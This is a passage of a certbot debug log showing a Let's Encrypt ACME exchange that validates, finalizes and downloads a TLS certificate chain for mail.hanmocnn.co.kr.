"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:25,783:DEBUG:acme.client:Storing nonce: qLPTsdtftvIGI-AgfpmS47Trma8dIcmIOln0-CDc_3wXfIK3OAw
|
||||||
|
2026-02-14 23:36:25,784:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
|
||||||
|
2026-02-14 23:36:28,784:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:28,789:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZnR2SUdJLUFnZnBtUzQ3VHJtYThkSWNtSU9sbjAtQ0RjXzN3WGZJSzNPQXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
|
||||||
|
"signature": "ilecAhgNDvzPhyiO67TcRdjIDVfiU0R-f14MptFH87fuaoeWltWtdAvii0u2s0rT8LCVj5s_3yWws2JKZliij4kgeaksgvEYgpFd8ht5NJggstzEYOruP_5v-_8Ud9kNHikz2xp7NDI8og7Xot9W3ZWUU1JuCisf5_uGie1ioUF-hUs63igiRmm3SctLS0TDMbdgIlIebINPebWxUyR_phtnojgqb3N_oVwreilYxw3LWb8vYheiVa69g3hvaFL43dTRTVUXU_3u-Ta1VcK62DVs_WMsA81Bve-jYuWnHMgfZnULW_uSYF_3Sf5vSBq_F3MSN2b2by7IBhWWyKU0ow",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:29,051:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
|
||||||
|
2026-02-14 23:36:29,052:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:28 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 827
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: qLPTsdtfmP9T29KLfsnuCiAy8NZJQArGPJFz89iLRfrTIc6DT2c
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:36:11Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:29,053:DEBUG:acme.client:Storing nonce: qLPTsdtfmP9T29KLfsnuCiAy8NZJQArGPJFz89iLRfrTIc6DT2c
|
||||||
|
2026-02-14 23:36:29,053:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
|
||||||
|
2026-02-14 23:36:32,054:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:32,058:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0Zm1QOVQyOUtMZnNudUNpQXk4TlpKUUFyR1BKRno4OWlMUmZyVEljNkRUMmMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
|
||||||
|
"signature": "Tj9IfzTtdCz-q_KVAJw7VwfALBFcfX8LhCyucOzvGJ6pP_pp5bA730VtR0j4heL81Hwfaz1Gsq44Yb_qGmqmEE3pYoeFS0JvN2b_nsEijMAx9P4Oxu0Ufrwduw0gUOPvk9IwbrrQ6eTbkpVJ7X2xxIdnAPueSkaA_lkYC6PxqJ3PIIRW9Ozfss3u-gXcYixZLFKEIMXoSGreZ4ipwY3jNfjJN_eaycbOz0bY-ln3ht_xTDCg44mWEtePtUp6b1q4fSqzY7bTcGlWpY_xsSPsWmUH8VZYqQfnS9Ias-7GySRJrH15uTbCv4N2F_JbDYxk61-xY_u7AN7S5UyeVWNlQw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:32,236:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 780
|
||||||
|
2026-02-14 23:36:32,237:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:32 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 780
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: qLPTsdtfmEvYkK_wxHKF9RSfcUUT1wUzsAB17jCVh9NDs3ikgz0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-03-16T23:36:30Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
|
||||||
|
"status": "valid",
|
||||||
|
"validated": "2026-02-14T23:36:11Z",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24",
|
||||||
|
"validationRecord": [
|
||||||
|
{
|
||||||
|
"url": "http://mail.hanmocnn.co.kr/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24",
|
||||||
|
"hostname": "mail.hanmocnn.co.kr",
|
||||||
|
"port": "80",
|
||||||
|
"addressesResolved": [
|
||||||
|
"222.117.41.51"
|
||||||
|
],
|
||||||
|
"addressUsed": "222.117.41.51"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:32,237:DEBUG:acme.client:Storing nonce: qLPTsdtfmEvYkK_wxHKF9RSfcUUT1wUzsAB17jCVh9NDs3ikgz0
|
||||||
|
2026-02-14 23:36:32,237:DEBUG:certbot._internal.error_handler:Calling registered functions
|
||||||
|
2026-02-14 23:36:32,238:INFO:certbot._internal.auth_handler:Cleaning up challenges
|
||||||
|
2026-02-14 23:36:32,238:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24
|
||||||
|
2026-02-14 23:36:32,238:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
|
||||||
|
2026-02-14 23:36:32,239:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBsAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEPKcT8XLoo1xwS02L\nEj00oFN88yCY0O8V/Tkd/0PtOcnyxb+ydE/KAoB2JpmRNnRxtA17Uqe1ZhFA/ehX\nYU3ZgdiDCzH1K8zOZUGKOnIWpsW50Z17xB9yobPvNlUWc/kKoDEwLwYJKoZIhvcN\nAQkOMSIwIDAeBgNVHREEFzAVghNtYWlsLmhhbm1vY25uLmNvLmtyMAoGCCqGSM49\nBAMCA2gAMGUCMQC9OAyPMN7sqWqGHxUDeGLkhlP3jiK8aODmOETTrBwWjReWYfNL\ndiye5QCa6C3lVHECMCIX/Hyk7gp4sCW+XOiTavmgA3ytDrSMpiIWQJfzzdcOH2zN\nzpUfaCYVlcFtuP6Znw==\n-----END CERTIFICATE REQUEST-----\n', form='pem')
|
||||||
|
2026-02-14 23:36:32,239:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-14 23:38:02.239703
|
||||||
|
2026-02-14 23:36:32,240:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "csr": "MIIBKTCBsAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEPKcT8XLoo1xwS02LEj00oFN88yCY0O8V_Tkd_0PtOcnyxb-ydE_KAoB2JpmRNnRxtA17Uqe1ZhFA_ehXYU3ZgdiDCzH1K8zOZUGKOnIWpsW50Z17xB9yobPvNlUWc_kKoDEwLwYJKoZIhvcNAQkOMSIwIDAeBgNVHREEFzAVghNtYWlsLmhhbm1vY25uLmNvLmtyMAoGCCqGSM49BAMCA2gAMGUCMQC9OAyPMN7sqWqGHxUDeGLkhlP3jiK8aODmOETTrBwWjReWYfNLdiye5QCa6C3lVHECMCIX_Hyk7gp4sCW-XOiTavmgA3ytDrSMpiIWQJfzzdcOH2zNzpUfaCYVlcFtuP6Znw"\n}'
|
||||||
|
2026-02-14 23:36:32,244:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0Zm1FdllrS193eEhLRjlSU2ZjVVVUMXdVenNBQjE3akNWaDlORHMzaWtnejAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwMzcwNjQzODI2In0",
|
||||||
|
"signature": "mCOEYzA48NByNR5p9Wzi-z2S6cMNG1MrJLtSAERYgabKYzhCjGFjEuxZLUz1VOaNDQ_9ejz5805yd2A5o2aNEDPdhseTeXZrG3zNwGvZ4IKBN8aLjhJEygriH2SKFJZWssq8mhSeHVN_ICrE6YTq5ihsb6o2ihTmmRQqKVgnNlj8XoXgGQl4Nq8k7257awIxAkvm3iWK-QbuwSiJCU-9Mj9B2wuPxO2Sjc_rNNXtWsrFC3koQA7Z0rgF_UT-gtj5CfLMsxdaP5SY995QXv-O9lY9yYC40edSE1hbnWoW2nx04Uc3LJrZ2SfvbPtYgnIj0E5GRPK2ZSw2ZcyUDCnJ3w",
|
||||||
|
"payload": "ewogICJjc3IiOiAiTUlJQktUQ0JzQUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFUEtjVDhYTG9vMXh3UzAyTEVqMDBvRk44OHlDWTBPOFZfVGtkXzBQdE9jbnl4Yi15ZEVfS0FvQjJKcG1STm5SeHRBMTdVcWUxWmhGQV9laFhZVTNaZ2RpREN6SDFLOHpPWlVHS09uSVdwc1c1MFoxN3hCOXlvYlB2TmxVV2Nfa0tvREV3THdZSktvWklodmNOQVFrT01TSXdJREFlQmdOVkhSRUVGekFWZ2hOdFlXbHNMbWhoYm0xdlkyNXVMbU52TG10eU1Bb0dDQ3FHU000OUJBTUNBMmdBTUdVQ01RQzlPQXlQTU43c3FXcUdIeFVEZUdMa2hsUDNqaUs4YU9EbU9FVFRyQndXalJlV1lmTkxkaXllNVFDYTZDM2xWSEVDTUNJWF9IeWs3Z3A0c0NXLVhPaVRhdm1nQTN5dERyU01waUlXUUpmenpkY09IMnpOenBVZmFDWVZsY0Z0dVA2Wm53Igp9"
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:37,057:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480370643826 HTTP/1.1" 200 455
|
||||||
|
2026-02-14 23:36:37,057:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:36 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 455
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826
|
||||||
|
Replay-Nonce: QkEzerAf0E6X65_9Bjtzue_QJCLFZEtmA7doUQlpM5e23i3Tlvk
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-02-21T23:36:11Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826",
|
||||||
|
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5"
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:37,058:DEBUG:acme.client:Storing nonce: QkEzerAf0E6X65_9Bjtzue_QJCLFZEtmA7doUQlpM5e23i3Tlvk
|
||||||
|
2026-02-14 23:36:38,059:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:38,063:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZjBFNlg2NV85Qmp0enVlX1FKQ0xGWkV0bUE3ZG9VUWxwTTVlMjNpM1RsdmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwMzcwNjQzODI2In0",
|
||||||
|
"signature": "hi-_iTlLBN2nVItxQCfD5kxWh9EsOOdoYQSioZpkWKRAdRSr9L26fsb8sBkO0nf69jn5RI-11O26JA0u_w7LaaD1rCvR39tWDvdrsdIKuwxUZuxTU3sLu49y7XetmALVW6r-5do21DZAveY7ahzXmhpoG-WeY33B_2APSFlbg2fZ5dJQx_sF0i_o-OtksCgS06ODwWKP0THlc3dpcRfmn6AeKbYjBjduZCZn8WUtho6AcPy0WOVcZPtpl0HiL1aopYVgLpeGBZb0M31ixgVR8JPdCviemJ79a2tvxAIu56G55Zsxoi2hCcB0rfeQ0mCZRY2UKVCUE4qWbz2QpLVz1w",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:38,242:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480370643826 HTTP/1.1" 200 455
|
||||||
|
2026-02-14 23:36:38,243:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:38 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 455
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826
|
||||||
|
Replay-Nonce: qLPTsdtf3ueEzlTXv-ytiM5j2C-SVQBDR5QGMdth3ZWFi80T__o
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-02-21T23:36:11Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826",
|
||||||
|
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5"
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:38,243:DEBUG:acme.client:Storing nonce: qLPTsdtf3ueEzlTXv-ytiM5j2C-SVQBDR5QGMdth3ZWFi80T__o
|
||||||
|
2026-02-14 23:36:38,243:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:38,248:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjN1ZUV6bFRYdi15dGlNNWoyQy1TVlFCRFI1UUdNZHRoM1pXRmk4MFRfX28iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzODU4YTQ4NWMwMzMwMjUwZDZkZTcxMmMzMjlmZjI2ZmI1In0",
|
||||||
|
"signature": "HTPcXpLVCGVP99416PBRlLwqk7JxPjp_WfRZcgJLPm1b-I71C96O4KR4lAxaO2TyIm39enpeHHDXCq8cO41ypoQwPT4qTVokDhMuO-rwwn1w1gih6YzR-erFCaqLBxMg_YsoEoSjTnfQ9SDhou8wPNur-fAAoHmXVoed8g7ZapbGjSikBkYX7YbVOkbstmFiV8Df_UgGB6Xm5-lVUnJ69p0eEu1-e4qyonFETOJ0kWjetMsdNtud9J6asRxnJas-ZbcR4rpcmRr-yiT6D-hwFfLIeNkZHEJGAn1E1g-uW3NPeAZdHh5aJ9wbykM5QfL1fIkhK7FCJTKKgdUSwoYwcg",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:38,427:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063858a485c0330250d6de712c329ff26fb5 HTTP/1.1" 200 2893
|
||||||
|
2026-02-14 23:36:38,428:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:38 GMT
|
||||||
|
Content-Type: application/pem-certificate-chain
|
||||||
|
Content-Length: 2893
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5/1>;rel="alternate"
|
||||||
|
Replay-Nonce: QkEzerAfvHenr9WRgSYKed7x868snGGgTeqk_BsqTqY3LnG8q7c
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIDpTCCAyugAwIBAgISBjhYpIXAMwJQ1t5xLDKf8m+1MAoGCCqGSM49BAMDMDIx
|
||||||
|
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
|
||||||
|
ODAeFw0yNjAyMTQyMjM4MDJaFw0yNjA1MTUyMjM4MDFaMB4xHDAaBgNVBAMTE21h
|
||||||
|
aWwuaGFubW9jbm4uY28ua3IwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQ8pxPxcuij
|
||||||
|
XHBLTYsSPTSgU3zzIJjQ7xX9OR3/Q+05yfLFv7J0T8oCgHYmmZE2dHG0DXtSp7Vm
|
||||||
|
EUD96FdhTdmB2IMLMfUrzM5lQYo6chamxbnRnXvEH3Khs+82VRZz+QqjggIWMIIC
|
||||||
|
EjAOBgNVHQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/
|
||||||
|
BAIwADAdBgNVHQ4EFgQU5Yj9WqUvf/9B0wtxhkCGx9UUkvgwHwYDVR0jBBgwFoAU
|
||||||
|
jw0TovYuftFQbDMYOF1ZjiNykcowMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzAC
|
||||||
|
hhZodHRwOi8vZTguaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE21haWwuaGFubW9j
|
||||||
|
bm4uY28ua3IwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAioCCgHoYc
|
||||||
|
aHR0cDovL2U4LmMubGVuY3Iub3JnLzU0LmNybDCCAQMGCisGAQQB1nkCBAIEgfQE
|
||||||
|
gfEA7wB1AJaXZL9VWJet90OHaDcIQnfp8DrV9qTzNm5GpD8PyqnGAAABnF6DWw8A
|
||||||
|
AAQDAEYwRAIgFec+y9jrM6c9Lf3vNDFYxydQLd2FfYCWPsTKF7uKHKgCIEz1X+xq
|
||||||
|
LnqvKjoLhm/BC0lTehEdcDEoHAtcHbr9XubUAHYAZBHEbKQS7KeJHKICLgC8q08o
|
||||||
|
B9QeNSer6v7VA8l9zfAAAAGcXoNqZgAABAMARzBFAiBypKO0gNsH/Fqd4jK8Z9YJ
|
||||||
|
5gWAE+eEoxhkeKF9n1GF2AIhAMlIUgwLKtsj2UdZ6qWWp0Ew6L0mMg8E72tV0rn2
|
||||||
|
TuYyMAoGCCqGSM49BAMDA2gAMGUCMDPRlyHa6dwh8HioZ/du2eihye/hY9f3zuEU
|
||||||
|
1YDjNsVO3yMkkr0MgFkBzbFO/lQDeAIxAKQ36q4cNqNwYrOd2gsuXczOpUEAeoUJ
|
||||||
|
A0miZddVRI/uTm5o0sYlEABAQ5jE3I56Gw==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP
|
||||||
|
MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy
|
||||||
|
Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa
|
||||||
|
Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF
|
||||||
|
bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c
|
||||||
|
S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb
|
||||||
|
R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB
|
||||||
|
9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB
|
||||||
|
MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j
|
||||||
|
cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB
|
||||||
|
BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE
|
||||||
|
DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j
|
||||||
|
ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0
|
||||||
|
RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d
|
||||||
|
AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8
|
||||||
|
otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA
|
||||||
|
aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm
|
||||||
|
Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2
|
||||||
|
HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1
|
||||||
|
Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR
|
||||||
|
xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d
|
||||||
|
tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/
|
||||||
|
jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS
|
||||||
|
u1igv3OefnWjSQ==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
2026-02-14 23:36:38,442:DEBUG:acme.client:Storing nonce: QkEzerAfvHenr9WRgSYKed7x868snGGgTeqk_BsqTqY3LnG8q7c
|
||||||
|
2026-02-14 23:36:38,442:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:38,446:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5/1:
|
||||||
|
{
|
||||||
|
